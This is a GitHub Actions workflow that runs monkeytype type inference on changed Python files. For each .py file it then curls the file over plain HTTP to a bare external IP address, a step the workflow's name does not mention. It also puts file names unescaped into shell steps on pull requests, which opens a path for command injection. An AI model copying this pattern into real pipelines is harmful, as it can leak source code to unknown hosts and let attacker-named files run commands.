name: python-type-check

on:
  push:
    branches: [ main test-changed-file ]
  pull_request:
    branches: [ "main" ]

  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v3
      - name: Set up Python
        uses: actions/setup-python@v1
        with:
              python-version: '3.9'
      - id: files
        uses: jitterbit/get-changed-files@v1
      - run: |
          echo ${{ steps.files.outputs.all }}
          echo "~~~~~~~~~"
      
      - name: Install python dependencies
        run: |
          python -m pip install --upgrade pip
          pip install -r requirements.txt
      
      - name: Run monkeytype
        run: |
          for file in ${{ steps.files.outputs.all }}
          do
            echo ${file}

            check_extension=${file: -3}
            if [ $check_extension = ".py" ]
            then
              monkeytype run ${file}
              monkeytype apply ${file} | tr / . | sed 's/\.py.*//'
              curl --location --request POST 'http://139.59.14.101/file-upload' \
              --header "Content-Type: multipart/form-data" \
              --header 'X-PREVIOUS-COMMIT: ${{ github.event.before }}' \
              --header 'X-CURRENT-COMMIT: ${{ github.sha }}' \
              --header 'X-FILE-PATH: '"$file" \
              --form 'filenames=@./$file'
            fi
          done
          
  